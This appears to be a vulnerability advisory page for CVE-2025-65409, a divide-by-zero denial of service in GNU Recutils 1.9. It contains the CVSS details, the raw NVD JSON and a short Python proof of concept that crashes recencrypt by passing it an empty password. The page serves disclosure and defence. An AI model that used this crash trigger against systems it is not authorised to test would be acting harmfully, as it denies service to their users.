Security Vulnerability Report
中文
CVE-2025-65409 CVSS 7.5 HIGH

CVE-2025-65409

Published: 2025-12-30 18:15:47
Last Modified: 2026-01-09 19:49:03
Source: [email protected]

Description

A divide-by-zero in the encryption/decryption routines of GNU Recutils v1.9 allows attackers to cause a Denial of Service (DoS) via inputting an empty value as a password.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:gnu:recutils:1.9:*:*:*:*:*:*:* - VULNERABLE
GNU Recutils < 1.9 (所有版本)
GNU Recutils = 1.9 (确认受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-65409 PoC - GNU Recutils Divide-by-Zero DoS This PoC demonstrates the divide-by-zero vulnerability in GNU Recutils v1.9 when an empty password is used for encryption/decryption operations. """ import subprocess import tempfile import os import sys def create_test_rec_file(): """Create a test .rec file for encryption testing""" rec_content = "%rec: TestRecord\n%key: id\n%key: data\n\n1 | Sample data for testing\n" return rec_content def test_empty_password_encryption(): """ Test the divide-by-zero vulnerability with empty password. The vulnerability occurs when recrypt function receives an empty string as the password parameter. """ with tempfile.NamedTemporaryFile(mode='w', suffix='.rec', delete=False) as f: f.write(create_test_rec_file()) rec_file = f.name encrypted_file = rec_file + '.enc' try: # Attempt to encrypt with empty password - triggers the vulnerability # This simulates: recencrypt -p "" input.rec output.rec print(f"[*] Testing CVE-2025-65409 with empty password...") print(f"[*] Input file: {rec_file}") result = subprocess.run( ['recencrypt', '-p', '', rec_file, encrypted_file], capture_output=True, text=True, timeout=10 ) print(f"[*] Return code: {result.returncode}") print(f"[*] Stdout: {result.stdout}") print(f"[*] Stderr: {result.stderr}") if result.returncode != 0 or 'error' in result.stderr.lower(): print("[+] Vulnerability confirmed: Empty password causes error/crash") return True except subprocess.TimeoutExpired: print("[+] Vulnerability confirmed: Process timeout (possible hang/crash)") return True except FileNotFoundError: print("[-] recencrypt command not found - GNU Recutils may not be installed") return False except Exception as e: print(f"[-] Unexpected error: {e}") return False finally: # Cleanup if os.path.exists(rec_file): os.unlink(rec_file) if os.path.exists(encrypted_file): os.unlink(encrypted_file) def test_with_rec2csv(): """ Alternative testing method using rec2csv with encrypted file """ print("\n[*] Testing with rec2csv decryption...") # Similar approach for decryption testing pass if __name__ == '__main__': print("=" * 60) print("CVE-2025-65409 GNU Recutils Divide-by-Zero PoC") print("=" * 60) test_empty_password_encryption()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65409", "sourceIdentifier": "[email protected]", "published": "2025-12-30T18:15:47.003", "lastModified": "2026-01-09T19:49:03.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A divide-by-zero in the encryption/decryption routines of GNU Recutils v1.9 allows attackers to cause a Denial of Service (DoS) via inputting an empty value as a password."}, {"lang": "es", "value": "Una división por cero en las rutinas de cifrado/descifrado de GNU Recutils v1.9 permite a los atacantes causar una denegación de servicio (DoS) mediante la introducción de un valor vacío como contraseña."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-369"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:recutils:1.9:*:*:*:*:*:*:*", "matchCriteriaId": "EE8CF692-2E62-45AC-8E69-9DC8BA7CE2D9"}]}]}], "references": [{"url": "http://ftp.gnu.org/gnu/recutils/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/MAXEUR5/Vulnerability_Disclosures/blob/main/2025/CVE-2025-65409.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://lists.gnu.org/archive/html/bug-recutils/2025-10/msg00004.html", "source": "[email protected]", "tags": ["Mailing List", "Patch"]}, {"url": "https://www.gnu.org/software/recutils/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/MAXEUR5/Vulnerability_Disclosures/blob/main/2025/CVE-2025-65409.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.